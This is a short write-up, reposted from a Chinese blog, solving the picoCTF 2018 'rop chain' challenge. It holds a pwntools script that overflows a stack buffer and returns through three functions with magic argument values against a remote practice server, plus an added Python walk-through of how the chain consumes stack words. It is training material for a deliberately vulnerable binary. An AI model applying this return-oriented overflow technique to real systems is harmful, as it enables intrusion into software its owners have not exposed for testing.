pwn | picoctf_2018_rop chain
Stack overflow, ret2text.
exp:
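from pwn import *
context.log_level = 'debug'
# Addresses of the functions used in the chain
p_vuln = 0x08048714
p_win1 = 0x080485CB
p_win2 = 0x080485D8
p_flag = 0x0804862B
# p = process('./PicoCTF_2018_rop_chain')
p = remote('node4.buuoj.cn', 26914)
p.recvuntil(b'input> ')
# 0x18 bytes up to saved EBP + 4 bytes of saved EBP, then the return chain.
# 32-bit cdecl: each function's return address is the next word and its
# first argument the word after that, so 0xBAAAAAAD lands in p_win2's
# argument slot and 0xDEADBAAD in p_flag's.
payload = b'M' * (0x18 + 4)
payload += p32(p_win1) + p32(p_win2) + p32(p_flag)
payload += p32(0xBAAAAAAD) + p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()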
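The following is an added example, not part of the original post: it models how successive `ret` instructions consume the overwritten stack words, which shows why the two constants sit where they do in the payload. It assumes 32-bit cdecl and that each function returns normally; `build_payload`, `walk_chain` and the `KNOWN` table are hypothetical helper names, and the labels are the variable names from the exploit above, not symbols verified against the binary.

```python
import struct

# Constructed from the values in the exploit above (labels are its variable names).
KNOWN = {0x080485CB: "p_win1", 0x080485D8: "p_win2", 0x0804862B: "p_flag"}
PAD = 0x18 + 4  # padding length used by the exploit


def build_payload():
    """Rebuild the exploit's payload without pwntools (p32 == '<I')."""
    words = [0x080485CB, 0x080485D8, 0x0804862B, 0xBAAAAAAD, 0xDEADBAAD]
    return b"M" * PAD + struct.pack("<5I", *words)


def walk_chain(payload, pad=PAD, known=KNOWN):
    """Return one record per function entered through the chain.

    Assumption: each function ends with a plain `ret` and leaves the
    words above its own frame untouched.
    """
    words = [w for (w,) in struct.iter_unpack("<I", payload[pad:])]
    frames = []
    i = 0
    while i < len(words) and words[i] in known:
        # `ret` pops words[i] into EIP. On entry to that function,
        # [esp] is its return address and [esp+4] its first argument.
        returns_to = words[i + 1] if i + 1 < len(words) else None
        arg1_slot = words[i + 2] if i + 2 < len(words) else None
        frames.append(
            {"func": known[words[i]], "returns_to": returns_to, "arg1_slot": arg1_slot}
        )
        i += 1  # the next `ret` consumes the following word
    return frames


def fmt(value):
    """Show a stack word as a known label or as hex."""
    if value is None:
        return "(past end of payload)"
    return KNOWN.get(value, f"0x{value:08X}")


if __name__ == "__main__":
    for frame in walk_chain(build_payload()):
        print(f"{frame['func']}: returns to {fmt(frame['returns_to'])}, "
              f"arg1 slot = {fmt(frame['arg1_slot'])}")
```

The walk stops at `0xBAAAAAAD`: it is `p_win2`'s argument and also the address `p_flag` would return to, so the process is expected to fault only after `p_flag` has run.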
This article is from cnblogs (博客园), author: Mz1. When reposting, please cite the original link: https://www.cnblogs.com/Mz1-rc/p/17351035.html